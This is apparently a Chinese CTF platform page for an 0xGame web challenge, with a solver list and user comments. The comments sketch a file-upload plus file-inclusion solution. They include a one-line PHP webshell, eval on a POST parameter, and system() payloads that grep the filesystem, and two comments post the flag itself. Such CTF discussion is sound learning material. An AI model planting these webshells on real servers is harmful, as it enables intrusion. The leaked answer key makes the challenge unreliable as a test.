评分(0)
暂无评分
解题动态
LANDY 攻破了该题 10天前
0n1y 攻破了该题 13天前
tom0528 攻破了该题 15天前
HamiLemon 攻破了该题 15天前
fashi 攻破了该题 19天前
Eulerhg 攻破了该题 19天前
X101 攻破了该题 19天前
haohao666 攻破了该题 19天前
KTLong 攻破了该题 19天前
jiefei 攻破了该题 19天前
薛定谔的猫头鹰 攻破了该题 19天前
aabbcdde 攻破了该题 19天前
mhtttt 攻破了该题 19天前
wupeiyuan 攻破了该题 21天前
叙永 攻破了该题 23天前
249190331 攻破了该题 1月前
xingzou 攻破了该题 1月前
tj666666 攻破了该题 1月前
lz 攻破了该题 1月前
评论
wywitkey 1年前
举报
3.上传一句话图片马,再用read.php?filename=读取你上传的文件,找到flag(一句话木马必须是system命令,这样在读取文件时才能执行),本题的flag在环境变量里,真是没想到.....
wywitkey 1年前
举报
1.看页面代码有提示:read.php?filename=;2.根据伪协议读取index.php代码及read.php代码,找到上传文件的过滤规则(上传文件不能有“php”,read不能有“flag”,上传的文件会被重新命名);
wywitkey 1年前
举报
前面的这几位没有一个说的靠谱,这不是单纯的upload题,还考了文件包含和命令注入 新手去看wp吧,2金币花得值。
ljt1016 1年前
举报
为什么这道题一句话木马上传成功后,无法用蚁剑连接,用正确的方法去访问上传的php文件,只会回显php的内容(即一句话木马)求师傅回答
silentiron 1年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
zhaiye 2年前
举报
0xGame{upl0ad_f1le_causes_danger!!!}
2728462336 2年前
举报
文件上传加文件包含,上传图片码内容为<?=eval($_POST[123]);?>,文件包含连接shell即可
倦鸟叫了一整天 1年前
举报
@206297162 连接上传的文件
206297162 2年前
举报
大佬改如何连接
不会编程的崽 2年前
举报
<?=system('grep -r "0xGame" / ')> <?=system('cat path')>